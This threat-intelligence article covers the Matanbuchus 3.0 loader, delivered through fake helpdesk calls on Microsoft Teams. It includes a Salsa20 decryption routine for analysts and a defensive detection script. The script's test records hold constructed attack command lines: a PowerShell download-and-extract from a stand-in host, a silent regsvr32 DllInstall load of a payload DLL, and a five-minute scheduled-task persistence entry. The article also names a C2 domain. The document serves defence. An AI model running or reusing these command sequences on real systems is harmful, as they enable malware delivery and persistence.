Malicious Use of Microsoft Teams Calls for Delivery and Execution of the Matanbuchus Loader
Matanbuchus 3.0 is a malware loader, a precursor to ransomware rather than ransomware itself, that is currently being delivered through social engineering over Microsoft Teams, a business communication platform its targets already use and trust [1][2][3].
The operators pick their targets, typically employees of specific organisations, and contact them through external Teams calls while posing as IT helpdesk staff [1][2]. On the call they convince the victim that the device has a problem needing remote assistance and walk them through starting Quick Assist, Microsoft's built-in remote-support tool, which gives the caller interactive control of the desktop once the victim accepts the session [3].
With control of the session, the attacker has the victim run a PowerShell script that downloads and extracts a ZIP archive containing the Matanbuchus loader. The loader is then started by DLL side-loading: a legitimate, signed executable loads the malicious DLL placed beside it, so the loader's code runs inside a trusted process [3]. Because the malicious code runs under a trusted process and the remote session is one the victim started themselves, the chain evades controls that look only for unknown executables, and it exploits the trust employees place in internal communication platforms such as Teams [2].
Matanbuchus 3.0 represents a significant evolution from earlier versions, now operating as a full-fledged Malware-as-a-Service (MaaS) platform on underground markets [2]. Key features include powerful obfuscation and evasion mechanisms, in-memory loading, post-compromise flexibility, sophisticated social engineering, and selective targeting [1][2][3].
Payloads are encrypted with Salsa20 under 256-bit keys, replacing the RC4 routine earlier versions used, which also sidelines any decryptor or signature written for the old scheme [2]. The decrypted payload is mapped and executed in memory rather than written to disk, so file-based scanning never sees it [3]. From there the loader can deploy follow-on payloads, among them Cobalt Strike (for command-and-control and lateral movement) and ransomware [1][2].
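As an added example (not code from this page or from the Morphisec analysis), here is a pure-Python Salsa20 for 256-bit keys, the kind of routine an analyst drops into a payload-decryption script once the key and nonce have been pulled out of the loader. The key, nonce and message below are constructed; how Matanbuchus derives or stores its key and nonce is not described here, so the block shows only the cipher itself, checked against the quarterround test vector from the Salsa20 specification and the fact that the core maps an all-zero block to all zeros.

```python
import struct

MASK = 0xFFFFFFFF


def rotl32(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def quarterround(y0, y1, y2, y3):
    """Salsa20 quarterround exactly as in the specification."""
    z1 = y1 ^ rotl32((y0 + y3) & MASK, 7)
    z2 = y2 ^ rotl32((z1 + y0) & MASK, 9)
    z3 = y3 ^ rotl32((z2 + z1) & MASK, 13)
    z0 = y0 ^ rotl32((z3 + z2) & MASK, 18)
    return z0, z1, z2, z3


def salsa20_hash(block, rounds=20):
    """Salsa20 core: 64-byte input -> 64-byte output (column/row double rounds, then feed-forward)."""
    x = list(struct.unpack("<16I", block))
    z = x[:]
    for _ in range(rounds // 2):
        # column round
        z[0], z[4], z[8], z[12] = quarterround(z[0], z[4], z[8], z[12])
        z[5], z[9], z[13], z[1] = quarterround(z[5], z[9], z[13], z[1])
        z[10], z[14], z[2], z[6] = quarterround(z[10], z[14], z[2], z[6])
        z[15], z[3], z[7], z[11] = quarterround(z[15], z[3], z[7], z[11])
        # row round
        z[0], z[1], z[2], z[3] = quarterround(z[0], z[1], z[2], z[3])
        z[5], z[6], z[7], z[4] = quarterround(z[5], z[6], z[7], z[4])
        z[10], z[11], z[8], z[9] = quarterround(z[10], z[11], z[8], z[9])
        z[15], z[12], z[13], z[14] = quarterround(z[15], z[12], z[13], z[14])
    return struct.pack("<16I", *[(a + b) & MASK for a, b in zip(x, z)])


SIGMA = b"expand 32-byte k"  # the constant words used with 256-bit keys


def salsa20_keystream(key, nonce, length):
    """Keystream for a 32-byte key and 8-byte nonce; the 64-bit block counter starts at 0."""
    if len(key) != 32 or len(nonce) != 8:
        raise ValueError("expects a 32-byte key and an 8-byte nonce")
    out, counter = bytearray(), 0
    while len(out) < length:
        # Block layout from the spec: sigma0 | k0 | sigma1 | nonce | counter | sigma2 | k1 | sigma3
        block = (SIGMA[0:4] + key[0:16] + SIGMA[4:8] + nonce + struct.pack("<Q", counter)
                 + SIGMA[8:12] + key[16:32] + SIGMA[12:16])
        out += salsa20_hash(block)
        counter += 1
    return bytes(out[:length])


def salsa20_crypt(key, nonce, data):
    """Encrypt or decrypt: XOR with the keystream is its own inverse."""
    return bytes(a ^ b for a, b in zip(data, salsa20_keystream(key, nonce, len(data))))


if __name__ == "__main__":
    # Constructed key/nonce/message for illustration only.
    key, nonce = bytes(range(32)), b"\x00\x01\x02\x03\x04\x05\x06\x07"
    blob = salsa20_crypt(key, nonce, b"stage-two payload bytes")
    print(salsa20_crypt(key, nonce, blob))
```

When recovering a real payload, the two things to establish from the sample are where the 32-byte key and 8-byte nonce live and whether the counter starts at zero; everything else above is fixed by the algorithm.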
Advanced encryption, in-memory execution and abuse of a trusted business platform together make Matanbuchus 3.0 a serious threat to organisations without solid user education and endpoint protection. After initial infection the loader creates a scheduled task named "EventLogBackupTask" that fires every five minutes, which keeps the loader resident across reboots and its command-and-control channel alive [1].
The C2 traffic imitates legitimate Skype desktop traffic so that it blends into normal network activity while talking to the server at nicewk[.]com over port 443 [1]. Persistence relies on an unusual combination of regsvr32 switches [1].
The behaviour described, silent execution with errors suppressed, no registry modification, and automatic invocation of the DLL's exported DllInstall function [1], is what regsvr32 does when run with /s (silent), /n (skip DllRegisterServer, so no COM registration is written) and /i (call DllInstall): the load looks like a routine DLL registration yet leaves no registry trace. Morphisec analysts intercepted Matanbuchus 3.0 before it was publicly advertised on underground forums [1].
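As an added example, not part of the original report, the following Python runs three detections over constructed Sysmon-style process-creation records: the PowerShell download-and-extract step, the regsvr32 /s /n /i DllInstall load, and creation of a minute-interval scheduled task (including the reported EventLogBackupTask name). Hostnames, paths, the URL and the command lines are all made up for the example. A task created through the Task Scheduler API rather than schtasks.exe surfaces in Security event 4698 instead, which this block does not parse.

```python
import re

# Constructed Sysmon Event ID 1 style records (hostnames, paths, URL and command
# lines are made up; this is not telemetry from the campaign). WS-A reproduces the
# chain described above, WS-B carries benign lookalikes that must not fire.
EVENTS = [
    {"host": "WS-A", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ep bypass -c "iwr https://example.invalid/pkg.zip -OutFile $env:TEMP\pkg.zip; Expand-Archive $env:TEMP\pkg.zip $env:TEMP\pkg"'},
    {"host": "WS-A", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s /n /i:"C:\Users\alice\AppData\Local\Temp\pkg" C:\Users\alice\AppData\Local\Temp\pkg\payload.dll'},
    {"host": "WS-A", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn EventLogBackupTask /sc minute /mo 5 /tr "regsvr32.exe /s /n /i:C:\Users\alice\AppData\Local\Temp\pkg C:\Users\alice\AppData\Local\Temp\pkg\payload.dll"'},
    {"host": "WS-B", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"host": "WS-B", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn NightlyBackup /sc daily /st 02:00 /tr C:\Tools\backup.exe'},
    {"host": "WS-B", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "Get-ChildItem $env:TEMP | Measure-Object"'},
]

TOKEN = re.compile(r'(?:[^\s"]+|"[^"]*")+')
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
EXTRACT = re.compile(r"expand-archive|zipfile\]::extract|extracttodirectory", re.I)

def tokenize(cmdline):
    """Split a Windows command line on whitespace while keeping quoted spans intact."""
    return TOKEN.findall(cmdline)

def switches(tokens):
    """Switch names (lower-case, without the leading / or - and any :arg) and, for
    space-separated switches such as schtasks' /tn NAME, the value that follows."""
    names, values = set(), {}
    for i in range(1, len(tokens)):
        tok = tokens[i]
        if tok[:1] in "/-":
            name = tok[1:].split(":", 1)[0].lower()
            names.add(name)
            if i + 1 < len(tokens) and tokens[i + 1][:1] not in "/-":
                values[name] = tokens[i + 1].strip('"')
    return names, values

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def rule_regsvr32_dllinstall(image, cmdline):
    # /s silent, /n skip DllRegisterServer (no COM registry writes), /i call DllInstall:
    # together they load a DLL and run its DllInstall export without registering anything.
    if basename(image) != "regsvr32.exe":
        return None
    names, _ = switches(tokenize(cmdline))
    return "regsvr32 /s /n /i: silent DllInstall with no registration" if {"s", "n", "i"} <= names else None

def rule_powershell_download_extract(image, cmdline):
    if basename(image) not in ("powershell.exe", "pwsh.exe"):
        return None
    if DOWNLOAD.search(cmdline) and EXTRACT.search(cmdline):
        return "PowerShell downloads and extracts an archive in one command"
    return None

def rule_schtasks_persistence(image, cmdline):
    if basename(image) != "schtasks.exe":
        return None
    names, values = switches(tokenize(cmdline))
    if "create" not in names:
        return None
    reasons = []
    task = values.get("tn", "")
    if task.lower() == "eventlogbackuptask":
        reasons.append("name matches the reported Matanbuchus persistence task")
    if values.get("sc", "").lower() == "minute" and values.get("mo", "").isdigit() and int(values["mo"]) <= 5:
        reasons.append(f"repeats every {values['mo']} min")
    action = tokenize(values.get("tr", ""))
    if action and rule_regsvr32_dllinstall(action[0], values["tr"]):
        reasons.append("task action is a regsvr32 DllInstall load")
    return f"scheduled task '{task}': " + "; ".join(reasons) if reasons else None

RULES = (rule_powershell_download_extract, rule_regsvr32_dllinstall, rule_schtasks_persistence)

def run_detections(events):
    """Return {host: [(event_index, finding), ...]} for every rule that fired."""
    findings = {}
    for idx, ev in enumerate(events):
        for rule in RULES:
            hit = rule(ev["image"], ev["cmdline"])
            if hit:
                findings.setdefault(ev["host"], []).append((idx, hit))
    return findings

def hosts_with_chain(findings, min_stages=2):
    """Hosts on which several distinct stages fired: one hit is a lead, a chain is a page."""
    return sorted(h for h, hits in findings.items() if len({f for _, f in hits}) >= min_stages)

if __name__ == "__main__":
    found = run_detections(EVENTS)
    for host, hits in found.items():
        for idx, finding in hits:
            print(f"{host} event#{idx}: {finding}")
    print("chain on:", hosts_with_chain(found))
```

Each rule is deliberately narrow so that it stays quiet on ordinary administration (a plain `regsvr32 /s`, a nightly backup task), and the host-level correlation is what turns three medium-confidence hits into a high-confidence alert.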
The campaign itself surfaced in July 2025, weaponising Microsoft Teams calls to deploy the newest iteration of the Matanbuchus loader [1]. This version adds an improved communication protocol, stronger obfuscation and broader system reconnaissance [1].
Organisations should invest in both user education and endpoint protection. Employees should treat unsolicited Teams calls, especially from external tenants, and any request to start Quick Assist or another remote-access tool as suspect, and confirm the caller's identity through a known internal channel before granting control. IT teams should restrict external access in Teams to approved domains, limit or monitor Quick Assist use, and alert on the artefacts this chain leaves behind: regsvr32 started with the switches that call DllInstall without registration, scheduled tasks with a minute-level trigger, and PowerShell that downloads and unpacks archives.
- Matanbuchus 3.0, a malware loader and ransomware precursor, is delivered through Microsoft Teams: attackers pose as IT helpdesk staff on external calls and talk victims into granting remote access through Quick Assist.
- Collaboration platforms such as Teams are essential for communication but also give attackers a trusted channel into an organisation, as the Matanbuchus 3.0 campaign shows; user education and endpoint protection are the countermeasures.